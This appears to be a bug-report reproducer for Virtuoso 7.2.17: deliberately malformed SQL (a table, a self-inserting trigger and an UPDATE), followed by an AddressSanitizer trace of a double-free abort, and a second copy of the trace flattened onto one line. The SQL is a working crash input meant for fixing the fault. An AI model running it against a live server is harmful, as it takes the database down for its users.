-- Crash reproducer for the "GPF: Dkbox.c:784 Double free" abort logged below.
-- The statements are kept verbatim: several contain stray or malformed tokens,
-- and tidying them may stop the fault from reproducing. The server process
-- aborts on this input (the log ends in ABORTING), so replay it on an instance
-- that can be lost, e.g. when verifying a fix.

-- v0: DECIMAL primary key v1 with a CHECK that adds 255 to a parenthesised
-- pair containing a CASE on v2; v2 is declared after the CHECK that names it.
CREATE TABLE v0 ( v1 DECIMAL UNIQUE PRIMARY KEY CHECK ( ( v1 , ( CASE WHEN v2 IS NULL THEN 97 ELSE v1 END ) ) + 255 ) , v2 NVARCHAR ) ;
-- v4: BEFORE INSERT trigger on v0 whose body inserts back into v0. The body has
-- a stray "R", a bare ", AS DECIMAL( 39 , 64 )" and row lists of 2 and 6 values
-- for a 2-column table.
-- NOTE(review): whether the server accepts or rejects this definition is not
-- shown on the page; confirm when triaging.
CREATE TRIGGER v4 BEFORE INSERT ON v0 R FOR EACH ROW INSERT INTO v0 VALUES ( 76 , AS DECIMAL( 39 , 64 ) ) , ( 'x' , 'x' , 49 , 0 , 'x' , 0 x1234567890abcdef ) ;
-- Seed row: the key is an arithmetic expression over large literals.
INSERT INTO v0 VALUES ( 17323404.000000 * 2147483647 + 0 , 80 ) ;
-- Unfiltered UPDATE that assigns a string to the DECIMAL key of every row.
-- The trace places the abort on this path: update_node_run -> trig_wrapper ->
-- trig_call_1 -> qr_subq_exec -> qi_handle_reset -> qi_kill -> qi_free ->
-- qi_inst_state_free -> ssl_free_data_v -> dk_free_tree (Dkbox.c:784), i.e.
-- while the trigger sub-query's instance state is being freed.
-- NOTE(review): v4 is declared BEFORE INSERT, yet the trace reaches trig_call
-- from the update node; which trigger fires there is not visible here.
-- NOTE(review): the final SEGV is a WRITE to 0xffffffffffffffff inside
-- gpf_notice, which looks like the server's own abort after it detected the
-- double free rather than the primary fault; confirm against Dkutil.c:88.
UPDATE v0 SET v1 = 'x' ;
03:35:29 /lib/x86_64-linux-gnu/libasan.so.6(+0x45c0e) [0x7f4dbb83dc0e]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x8710b9) [0x55dd1606a0b9]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x87117d) [0x55dd1606a17d]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x853afa) [0x55dd1604cafa]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a1d2b) [0x55dd15b9ad2b]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a26b2) [0x55dd15b9b6b2]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3ac8eb) [0x55dd15ba58eb]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a329e) [0x55dd15b9c29e]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b00f5) [0x55dd15ba90f5]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b3a2d) [0x55dd15baca2d]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd253) [0x55dd15bc6253]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd458) [0x55dd15bc6458]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd9d0) [0x55dd15bc69d0]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x434d84) [0x55dd15c2dd84]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x4351b3) [0x55dd15c2e1b3]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a4439) [0x55dd15b9d439]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a80ff) [0x55dd15ba10ff]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a425f) [0x55dd15b9d25f]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3f9c9c) [0x55dd15bf2c9c]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x28566d) [0x55dd15a7e66d]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b2736) [0x55dd15bab736]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3bbcdf) [0x55dd15bb4cdf]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3bc22d) [0x55dd15bb522d]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3c2ef3) [0x55dd15bbbef3]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x8736fd) [0x55dd1606c6fd]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x88074b) [0x55dd1607974b]
03:35:29 /lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7f4dbb067ac3]
03:35:29 /lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7f4dbb0f8a74]
03:35:29 GPF: Dkbox.c:784 Double free
GPF: Dkbox.c:784 Double free
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1178000==ERROR: AddressSanitizer: SEGV on unknown address 0xffffffffffffffff (pc 0x55dd1606a24b bp 0x7f4da86c7e70 sp 0x7f4da86c7e50 T6)
==1178000==The signal is caused by a WRITE memory access.
#0 0x55dd1606a24b in gpf_notice /home/virtuoso-opensource/libsrc/Dk/Dkutil.c:88
#1 0x55dd1604caf9 in dk_free_tree /home/virtuoso-opensource/libsrc/Dk/Dkbox.c:784
#2 0x55dd15b9ad2a in ssl_free_data_v /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:190
#3 0x55dd15b9b6b1 in qi_inst_state_free /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:530
#4 0x55dd15ba58ea in qi_free /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:3008
#5 0x55dd15b9c29d in qi_kill /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:763
#6 0x55dd15ba90f4 in qi_handle_reset /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:3980
#7 0x55dd15baca2c in qr_subq_exec /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:4856
#8 0x55dd15bc6252 in trig_call_1 /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:230
#9 0x55dd15bc6457 in trig_call /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:257
#10 0x55dd15bc69cf in trig_wrapper /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:362
#11 0x55dd15c2dd83 in update_node_run /home/virtuoso-opensource/libsrc/Wi/update.c:936
#12 0x55dd15c2e1b2 in update_node_input /home/virtuoso-opensource/libsrc/Wi/update.c:981
#13 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982
#14 0x55dd15b9d438 in qn_ts_send_output /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:1059
#15 0x55dd15ba10fe in table_source_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:2024
#16 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982
#17 0x55dd15b9d25e in qn_send_output /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:1028
#18 0x55dd15bf2c9b in set_ctr_vec_input /home/virtuoso-opensource/libsrc/Wi/sqlvnode.c:642
#19 0x55dd15a7e66c in set_ctr_input /home/virtuoso-opensource/libsrc/Wi/sort.c:1317
#20 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982
#21 0x55dd15bab735 in qr_dml_array_exec /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:4637
#22 0x55dd15bb4cde in sf_sql_execute /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:1991
#23 0x55dd15bb522c in sf_sql_execute_w /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:2051
#24 0x55dd15bbbef2 in sf_sql_execute_wrapper /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:3997
#25 0x55dd1606c6fc in future_wrapper /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:1174
#26 0x55dd1607974a in _thread_boot /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:296
#27 0x7f4dbb067ac2 (/lib/x86_64-linux-gnu/libc.so.6+0x94ac2)
#28 0x7f4dbb0f8a73 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x125a73)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/virtuoso-opensource/libsrc/Dk/Dkutil.c:88 in gpf_notice
Thread T6 created by T4 here:
#0 0x7f4dbb850685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
#1 0x55dd16079a0e in oplthread_create /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:425
#2 0x55dd1606ae4b in get_free_thread /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:402
#3 0x55dd1606d854 in schedule_request /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:1654
#4 0x55dd1606ed2d in read_service_request /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:2439
#5 0x55dd1606afe3 in call_default_read /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:498
#6 0x55dd1606b79d in check_inputs_low /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:681
#7 0x55dd1606f8c9 in server_loop /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:2812
#8 0x55dd1607974a in _thread_boot /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:296
#9 0x7f4dbb067ac2 (/lib/x86_64-linux-gnu/libc.so.6+0x94ac2)
Thread T4 created by T0 here:
#0 0x7f4dbb850685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
#1 0x55dd16079a0e in oplthread_create /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:425
#2 0x55dd16070458 in PrpcProtocolInitialize /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:3264
#3 0x55dd160704be in PrpcListen /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:3298
#4 0x55dd158e7ee7 in main /home/virtuoso-opensource/binsrc/virtuoso/viunix.c:704
#5 0x7f4dbaffcd8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f)
==1178000==ABORTING
Environment:
Ubuntu 22.04, virtuoso v7.2.17 0a2b062 ~ latest version 06e00b6
POC
Error output
03:35:29 /lib/x86_64-linux-gnu/libasan.so.6(+0x45c0e) [0x7f4dbb83dc0e] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x8710b9) [0x55dd1606a0b9] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x87117d) [0x55dd1606a17d] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x853afa) [0x55dd1604cafa] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a1d2b) [0x55dd15b9ad2b] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a26b2) [0x55dd15b9b6b2] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3ac8eb) [0x55dd15ba58eb] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a329e) [0x55dd15b9c29e] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b00f5) [0x55dd15ba90f5] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b3a2d) [0x55dd15baca2d] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd253) [0x55dd15bc6253] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd458) [0x55dd15bc6458] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd9d0) [0x55dd15bc69d0] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x434d84) [0x55dd15c2dd84] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x4351b3) [0x55dd15c2e1b3] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a4439) [0x55dd15b9d439] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a80ff) [0x55dd15ba10ff] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a425f) [0x55dd15b9d25f] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3f9c9c) [0x55dd15bf2c9c] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x28566d) [0x55dd15a7e66d] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b2736) [0x55dd15bab736] 03:35:29 
/usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3bbcdf) [0x55dd15bb4cdf] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3bc22d) [0x55dd15bb522d] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3c2ef3) [0x55dd15bbbef3] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x8736fd) [0x55dd1606c6fd] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x88074b) [0x55dd1607974b] 03:35:29 /lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7f4dbb067ac3] 03:35:29 /lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7f4dbb0f8a74] 03:35:29 GPF: Dkbox.c:784 Double free GPF: Dkbox.c:784 Double free AddressSanitizer:DEADLYSIGNAL ================================================================= ==1178000==ERROR: AddressSanitizer: SEGV on unknown address 0xffffffffffffffff (pc 0x55dd1606a24b bp 0x7f4da86c7e70 sp 0x7f4da86c7e50 T6) ==1178000==The signal is caused by a WRITE memory access. #0 0x55dd1606a24b in gpf_notice /home/virtuoso-opensource/libsrc/Dk/Dkutil.c:88 #1 0x55dd1604caf9 in dk_free_tree /home/virtuoso-opensource/libsrc/Dk/Dkbox.c:784 #2 0x55dd15b9ad2a in ssl_free_data_v /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:190 #3 0x55dd15b9b6b1 in qi_inst_state_free /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:530 #4 0x55dd15ba58ea in qi_free /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:3008 #5 0x55dd15b9c29d in qi_kill /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:763 #6 0x55dd15ba90f4 in qi_handle_reset /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:3980 #7 0x55dd15baca2c in qr_subq_exec /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:4856 #8 0x55dd15bc6252 in trig_call_1 /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:230 #9 0x55dd15bc6457 in trig_call /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:257 #10 0x55dd15bc69cf in trig_wrapper /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:362 #11 0x55dd15c2dd83 in update_node_run /home/virtuoso-opensource/libsrc/Wi/update.c:936 #12 0x55dd15c2e1b2 in update_node_input /home/virtuoso-opensource/libsrc/Wi/update.c:981 #13 
0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982 #14 0x55dd15b9d438 in qn_ts_send_output /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:1059 #15 0x55dd15ba10fe in table_source_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:2024 #16 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982 #17 0x55dd15b9d25e in qn_send_output /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:1028 #18 0x55dd15bf2c9b in set_ctr_vec_input /home/virtuoso-opensource/libsrc/Wi/sqlvnode.c:642 #19 0x55dd15a7e66c in set_ctr_input /home/virtuoso-opensource/libsrc/Wi/sort.c:1317 #20 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982 #21 0x55dd15bab735 in qr_dml_array_exec /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:4637 #22 0x55dd15bb4cde in sf_sql_execute /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:1991 #23 0x55dd15bb522c in sf_sql_execute_w /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:2051 #24 0x55dd15bbbef2 in sf_sql_execute_wrapper /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:3997 #25 0x55dd1606c6fc in future_wrapper /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:1174 #26 0x55dd1607974a in _thread_boot /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:296 #27 0x7f4dbb067ac2 (/lib/x86_64-linux-gnu/libc.so.6+0x94ac2) #28 0x7f4dbb0f8a73 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x125a73) AddressSanitizer can not provide additional info. 
SUMMARY: AddressSanitizer: SEGV /home/virtuoso-opensource/libsrc/Dk/Dkutil.c:88 in gpf_notice Thread T6 created by T4 here: #0 0x7f4dbb850685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216 #1 0x55dd16079a0e in oplthread_create /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:425 #2 0x55dd1606ae4b in get_free_thread /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:402 #3 0x55dd1606d854 in schedule_request /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:1654 #4 0x55dd1606ed2d in read_service_request /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:2439 #5 0x55dd1606afe3 in call_default_read /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:498 #6 0x55dd1606b79d in check_inputs_low /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:681 #7 0x55dd1606f8c9 in server_loop /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:2812 #8 0x55dd1607974a in _thread_boot /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:296 #9 0x7f4dbb067ac2 (/lib/x86_64-linux-gnu/libc.so.6+0x94ac2) Thread T4 created by T0 here: #0 0x7f4dbb850685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216 #1 0x55dd16079a0e in oplthread_create /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:425 #2 0x55dd16070458 in PrpcProtocolInitialize /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:3264 #3 0x55dd160704be in PrpcListen /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:3298 #4 0x55dd158e7ee7 in main /home/virtuoso-opensource/binsrc/virtuoso/viunix.c:704 #5 0x7f4dbaffcd8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) ==1178000==ABORTING